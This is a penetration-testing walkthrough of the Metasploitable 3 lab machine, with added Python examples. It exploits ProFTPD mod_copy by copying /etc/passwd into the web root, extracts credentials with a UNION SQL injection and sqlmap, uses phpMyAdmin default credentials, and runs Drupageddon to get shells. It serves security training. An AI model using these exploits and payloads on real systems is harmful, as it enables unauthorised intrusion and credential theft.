Metasploitable 3 Walkthrough: Penetration Testing (Part 1)


January 3, 2025

Metasploitable3 is the successor to Metasploitable2, built to provide a more realistic environment for practicing penetration testing techniques. It ships with new vulnerable services and misconfigurations, offering a broader range of challenges for ethical hackers and security enthusiasts. Let's explore what makes this version different and work through some of its services.

Network Discovery 

Let's start with Nmap to discover what the target exposes.

Nmap (Network Mapper) is used to discover hosts, open ports and service versions, and with its NSE scripts some known vulnerabilities; it is one of the essential tools for penetration testers and defenders alike.

sudo nmap -sV -sS 10.0.2.6

-sS: SYN ("stealth") scan. Nmap sends a SYN and never completes the TCP handshake, which is faster and keeps the connection out of most application logs (it is still visible to firewalls and IDS).

-sV: Detects the version of services running on open ports.

This is a quick scan of 10.0.2.6 to identify open ports and service versions. Without -p-, Nmap only probes its default list of the 1,000 most common TCP ports, not all 65,535.

Note: because this is a walkthrough rather than an in-depth engagement, a full-port scan (-p-) and deeper enumeration are left for a future part of the series.

The Exploitation process

Port 21: ProFTPD 1.3.5

The first finding is on port 21. The banner identifies ProFTPD 1.3.5, whose mod_copy module (CVE-2015-3306) lets an unauthenticated client copy arbitrary files on the server with the SITE CPFR and SITE CPTO commands. Copying content into the web root turns this file-copy primitive into remote code execution, as demonstrated below.

Manual Exploitation

First, connect to the port with telnet 10.0.2.6 21 (telnet is a command-line client for talking to a remote TCP service interactively) and then send site cpfr /etc/passwd:

  • SITE: Initiates a server-specific command.
  • CPFR: Names the file to copy from (in this case, /etc/passwd).

The destination is then given as SITE CPTO /path/to/destination; here site cpto /var/www/html/test.php writes the copy into the web root, overwriting test.php.

test.php has now been overwritten with the contents of /etc/passwd, which confirms an unauthenticated arbitrary file copy on the server. No USER or PASS command was needed at any point: that is the bug.

As the picture below :
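The telnet session above, replayed as a small Python client, is an added example and not part of the original walkthrough or of ProFTPD itself. The FakeProftpd class is a constructed stand-in that answers SITE CPFR/CPTO the way an unpatched mod_copy does and records what it receives, so the exchange can be run offline; the reply strings are assumptions modelled on ProFTPD's wording, and only the three-digit codes are checked.

```python
import socket
import threading

# Constructed stand-in for an unpatched ProFTPD 1.3.5 (not the real daemon):
# it answers unauthenticated SITE CPFR/CPTO the way mod_copy does and records
# every command line, so the client below can be exercised offline.
class FakeProftpd:
    def __init__(self):
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(("127.0.0.1", 0))  # the OS picks a free port
        self.listener.listen(1)
        self.port = self.listener.getsockname()[1]
        self.received = []
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.listener.accept()
        with conn:
            conn.sendall(b"220 ProFTPD 1.3.5 Server (fake) [127.0.0.1]\r\n")
            buf = b""
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    return
                buf += chunk
                while b"\r\n" in buf:
                    line, buf = buf.split(b"\r\n", 1)
                    cmd = line.decode("latin-1")
                    self.received.append(cmd)
                    upper = cmd.upper()
                    if upper.startswith("SITE CPFR "):
                        conn.sendall(b"350 File or directory exists, ready for destination name\r\n")
                    elif upper.startswith("SITE CPTO "):
                        conn.sendall(b"250 Copy successful\r\n")
                    elif upper == "QUIT":
                        conn.sendall(b"221 Goodbye.\r\n")
                        return
                    else:
                        conn.sendall(b"500 Unknown command\r\n")


def _reply(f):
    """Read one FTP reply line and return it without the CRLF."""
    return f.readline().decode("latin-1").rstrip("\r\n")


def mod_copy(host, port, src, dst, timeout=5.0):
    """Replay the telnet session: SITE CPFR <src>, then SITE CPTO <dst>.

    Returns the three-digit reply code for each step. No USER/PASS is sent:
    the bug is that mod_copy honours these commands before authentication.
    """
    codes = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        codes["banner"] = _reply(f)[:3]
        s.sendall(f"SITE CPFR {src}\r\n".encode())
        codes["cpfr"] = _reply(f)[:3]
        # 350 means the server accepted the source; anything else and CPTO is pointless.
        if codes["cpfr"] == "350":
            s.sendall(f"SITE CPTO {dst}\r\n".encode())
            codes["cpto"] = _reply(f)[:3]
        s.sendall(b"QUIT\r\n")
        _reply(f)
    return codes


def copy_succeeded(codes):
    """True only if both halves of the copy were acknowledged (350 then 250)."""
    return codes.get("cpfr") == "350" and codes.get("cpto") == "250"


if __name__ == "__main__":
    srv = FakeProftpd()
    result = mod_copy("127.0.0.1", srv.port, "/etc/passwd", "/var/www/html/test.php")
    print(result, "vulnerable" if copy_succeeded(result) else "not vulnerable")
```

Pointing mod_copy() at a real host on port 21 gives a quick unauthenticated check: a patched server answers the CPFR with an error code instead of 350, and copy_succeeded() returns False. The client reads single-line replies only, which is what ProFTPD sends for these commands.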

With Metasploit

Set the module options as in the picture below.

Then run the exploit.

Port 80: Apache httpd 2.4.7

Payroll_app

The payroll app has a UNION-based SQL injection in its login page.

As the picture below shows, manipulating the password parameter changes the response in a way that indicates SQL injection.

So let's hand the request to sqlmap, setting the level and risk and marking the vulnerable parameter by appending an asterisk ("*") to the password value, which is the injectable parameter as seen in the Burp Suite Repeater request.
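What the injection does inside the login query, shown as an added example that is not the payroll app's code: a login written by splicing input into the SQL text, the UNION payload in the password field that makes it return every credential pair, the ORDER BY probe used to learn how many columns the UNION must supply, and the same lookup with bound parameters. The in-memory SQLite table, its column names and the two accounts are constructed for illustration and are not the Metasploitable3 schema or its real credentials; the page's target is MySQL, where the trailing "-- " comment needs the space.

```python
import sqlite3

# Constructed in-memory stand-in for the payroll app's user table. Table and
# column names and the accounts are assumptions for illustration only.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES
            ('payroll_admin', 'S3cretPayr0ll'),
            ('clerk', 'clerk2024');
    """)
    return db


def login_vulnerable(db, username, password):
    """Login the way the vulnerable app does it: user input spliced into SQL text."""
    query = ("SELECT username, password FROM users "
             f"WHERE username='{username}' AND password='{password}'")
    return db.execute(query).fetchall()


def login_fixed(db, username, password):
    """Same lookup with bound parameters: the input can never change the query."""
    return db.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


# The UNION payload goes in the password field. The original SELECT matches no
# row (bogus user, empty password); the UNIONed SELECT appends every credential
# pair in the table. The trailing "-- " comments out the closing quote.
UNION_PAYLOAD = "' UNION SELECT username, password FROM users -- "


def find_column_count(db, max_cols=8):
    """Classic probe: 'ORDER BY n' only succeeds while n <= number of selected
    columns, which tells the attacker how many columns the UNION must match."""
    for n in range(1, max_cols + 1):
        try:
            login_vulnerable(db, "nobody", f"' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_credentials(login_fn, db):
    """Drive a login function with the payload and return whatever rows leak."""
    return sorted(login_fn(db, "nobody", UNION_PAYLOAD))


if __name__ == "__main__":
    db = make_db()
    print("columns:", find_column_count(db))
    print("vulnerable:", dump_credentials(login_vulnerable, db))
    print("fixed:", dump_credentials(login_fixed, db))
```

The column-count probe is the step sqlmap performs for you when it confirms a UNION injection; against the fixed function the payload is just a very long, wrong password and nothing leaks.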

Using the sqlmap tool

sqlmap -r req.txt --dbms="MySQL" --level=1 --risk=1 --dump --output-dir=output --batch

As the following picture:

--dbms: Specifies the target DBMS (database management system). Here sqlmap is told that the database is MySQL, so it skips the detection phase and only uses MySQL payloads.

--level=1: Defines how many tests to perform. Level 1 is the lowest (and the default), covering the basic SQL injection tests.

--risk=1: Defines the risk of the tests sqlmap will run. Risk 1 is the least aggressive (and the default) and is used to avoid causing damage to the target system.

--dump: Instructs sqlmap to dump (extract) the database content.

--output-dir=output: Specifies the directory where the results are saved.

--batch: Runs sqlmap in batch mode, answering every prompt with the default so no user interaction is needed.

The output was a users.csv file containing the following:

I tried these credentials on SSH and they are valid, so I now have accounts on the server.

Running the dumped list through Hydra against SSH confirmed that several of them are valid users.

phpMyAdmin

This one is an authentication weakness rather than a software bug: the phpMyAdmin password is provided in the Metasploitable3 wiki.

Explaining the bug 

So set the options to the port, which was 80, and TARGETURI to /phpmyadmin/, with the username and password root:sploitme.

As you can see in the picture below, running the exploit gives us a Meterpreter shell.

Drupal

Next, the /drupal/ path.

Directory fuzzing on it turned up a file that contains the version of Drupal.

The file reported the version as 7.5, and I tried every module related to that version before realizing it was a rabbit hole: the Nmap scan put the installation at a version before 7.5, which is vulnerable to CVE-2014-3704. That CVE (Drupageddon, SA-CORE-2014-005, a SQL injection in Drupal 7's database abstraction layer) affects all 7.x releases before 7.32. Note that 7.5 itself would be in scope too, since 7.5 is older than 7.32; a version check has to compare release numbers numerically, not as strings.
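An added example, not from the original walkthrough, of fingerprinting the version from a changelog-style file and deciding numerically whether Drupageddon applies. The CHANGELOG.txt excerpt is constructed (Drupal's real file lists releases newest first, so the first "Drupal x.y" line is the installed version), and string_compare_trap() shows why a lexical comparison of "7.5" against "7.32" gives the wrong answer.

```python
import re

# Constructed excerpt of a Drupal 7 CHANGELOG.txt, the kind of file directory
# fuzzing turns up. Dates and entries are illustrative only.
SAMPLE_CHANGELOG = """\
Drupal 7.5, 2011-08-03
----------------------
- Various bug fixes.

Drupal 7.4, 2011-06-29
----------------------
- Various bug fixes.
"""

VERSION_LINE = re.compile(r"^Drupal (\d+)\.(\d+)", re.MULTILINE)

# CVE-2014-3704 (Drupageddon, SA-CORE-2014-005) is fixed in Drupal 7.32.
DRUPAGEDDON_FIXED = (7, 32)


def parse_version(text):
    """Return the first 'Drupal x.y' line as a (major, minor) tuple, or None."""
    m = VERSION_LINE.search(text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def vulnerable_to_drupageddon(version):
    """True for any 7.x release below 7.32; tuples compare numerically."""
    return version is not None and version[0] == 7 and version < DRUPAGEDDON_FIXED


def string_compare_trap(version_str):
    """What a lexical compare says: '7.5' sorts after '7.32', so 7.5 looks patched."""
    return version_str < "7.32"


if __name__ == "__main__":
    v = parse_version(SAMPLE_CHANGELOG)
    print("version:", v, "vulnerable:", vulnerable_to_drupageddon(v))
    print("string compare says 7.5 < 7.32:", string_compare_trap("7.5"))
```

Fetching the real file from the target and feeding the body to parse_version() is all that changes in practice; the comparison is the part that gets people lost.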

In Metasploit, the drupageddon module (exploit/multi/http/drupal_drupageddon) covers this CVE.

After running the exploit we get a shell, as in the picture below.

Conclusion

This Metasploitable 3 walkthrough highlights practical penetration testing techniques. Using Nmap, Metasploit, Hydra and sqlmap, we explored weaknesses in ProFTPD, Apache and the applications behind it: the payroll app, phpMyAdmin and Drupal. By exploiting an unauthenticated file copy, SQL injection and default credentials, we demonstrated how attackers gain a foothold. Telnet showed the ProFTPD exploit by hand while Metasploit automated it, sqlmap extracted credentials that were then replayed against SSH with Hydra. Overall, the exercise shows the value of scanning for exposed services, checking their versions, and keeping software patched and default passwords changed.
